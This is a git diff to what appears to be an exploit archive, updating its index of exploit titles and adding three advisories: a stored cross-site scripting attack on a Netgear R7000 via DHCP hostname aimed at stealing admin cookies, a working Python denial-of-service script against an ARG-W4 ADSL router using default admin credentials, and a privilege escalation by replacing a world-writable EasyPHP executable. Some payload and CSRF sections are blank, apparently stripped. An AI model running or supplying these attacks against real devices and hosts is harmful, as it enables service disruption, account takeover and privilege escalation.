diff --git a/files.csv b/files.csv
index faf88debe..bec4b9934 100644
--- a/files.csv
+++ b/files.csv
@@ -3073,7 +3073,7 @@ id,file,description,date,author,platform,type,port
23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0
23654,platforms/windows/dos/23654.txt,"Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0
23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0
-23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0
+23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0
23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0
@@ -3256,7 +3256,7 @@ id,file,description,date,author,platform,type,port
24741,platforms/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,windows,dos,0
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0
24747,platforms/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
-24755,platforms/linux/dos/24755.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0
+24755,platforms/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0
24756,platforms/linux/dos/24756.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0
24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos,0
24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos,0
@@ -3926,7 +3926,7 @@ id,file,description,date,author,platform,type,port
31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
-31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC",2014-01-31,"Kees Cook",linux,dos,0
+31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)",2014-01-31,"Kees Cook",linux,dos,0
31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
@@ -8691,6 +8691,7 @@ id,file,description,date,author,platform,type,port
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
+40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -20516,7 +20517,7 @@ id,file,description,date,author,platform,type,port
7925,platforms/php/webapps/7925.txt,"revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0
7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0
-7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
+7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0
7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0
@@ -36862,3 +36863,5 @@ id,file,description,date,author,platform,type,port
40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0
40887,platforms/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,hardware,webapps,0
40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
+40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
+40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
diff --git a/platforms/hardware/webapps/40898.txt b/platforms/hardware/webapps/40898.txt
new file mode 100755
index 000000000..8f3591284
--- /dev/null
+++ b/platforms/hardware/webapps/40898.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
+# Date: 11-12-2016
+# Exploit Author: Vincent Yiu
+# Contact: https://twitter.com/vysecurity
+# Vendor Homepage: https://www.netgear.com/
+# Category: Hardware / WebApp
+# Version: V1.0.7.2_1.1.93 + LATEST to date
+
+-Vulnerability
+An user who has access to send DHCP via either VPN or Wireless connection can serve a host name with script tags to trigger XSS.
+
+Could be potentially used to connect to open or guest WIFI hotspot and inject stored XSS into admin panel and steal cookie for authentication.
+
+http://RouterIP/start.htm
+
+Then visit the "view who's connected" page.
+
+-Proof Of Concept
+Set /etc/dhcp/dhclient.conf
+
+send host-name "";
diff --git a/platforms/hardware/webapps/40901.txt b/platforms/hardware/webapps/40901.txt
new file mode 100755
index 000000000..8bc6a4b68
--- /dev/null
+++ b/platforms/hardware/webapps/40901.txt
@@ -0,0 +1,66 @@
+# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
+# Date: 2016-12-11
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM
+# Tested on: Windows AND Linux
+# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
+
+1 - Denial of Service
+
+#!/usr/bin/python
+import urllib2
+import urllib
+
+site=raw_input("Enter Url : ")
+site=site+"/form2Upnp.cgi"
+username='admin'
+password='admin'
+p = urllib2.HTTPPasswordMgrWithDefaultRealm()
+p.add_password(None, site, username, password)
+handler = urllib2.HTTPBasicAuthHandler(p)
+opener = urllib2.build_opener(handler)
+urllib2.install_opener(opener)
+
+post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
+data = urllib.urlencode(post)
+try:
+ html = urllib2.urlopen(site,data)
+ print ("Done ! c_C")
+except:
+ print ("Done ! c_C")
+
+2-1 Cross-Site Request Forgery (Add Admin)
+
+
+
+
+
+
+
+2-2 Cross-Site Request Forgery (Change DNS)
+
+
+
+
+
+
+
+
+
diff --git a/platforms/windows/local/40902.txt b/platforms/windows/local/40902.txt
new file mode 100755
index 000000000..afb7478dd
--- /dev/null
+++ b/platforms/windows/local/40902.txt
@@ -0,0 +1,28 @@
+Title: EasyPHP Devserver Insecure File Permissions Privilege Escalation
+Application: EasyPHP Devserver
+Versions Affected: 16.1
+Vendor URL: http://www.easyphp.org/
+Discovered by: Ashiyane Digital Security Team ~ Micle
+Tested on: Windows 10 Professional x86
+Bugs: Insecure File Permissions Privilege Escalation
+Source: http://www.micle.ir/exploits/1003
+Date: 10-Dec-2016
+
+Description:
+EasyPHP installs by default to "C:\Program Files\EasyPHP-Devserver-16.1"
+with very weak file permissions granting any
+user full permission to the exe. This allows opportunity for code
+execution against any other user running the application.
+
+Proof:
+C:\Program Files\EasyPHP-Devserver-16.1>cacls run-easyphp-devserver.exe
+C:\Program Files\EasyPHP-Devserver-16.1\run-easyphp-devserver.exe
+BUILTIN\Users:(ID)C
+NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+ APPLICATION PACKAGE AUTHORITY\ALL
+APPLICATION PACKAGES:(ID)R
+
+Exploit:
+Simply replace run-easyphp-devserver.exe and wait for execution.
+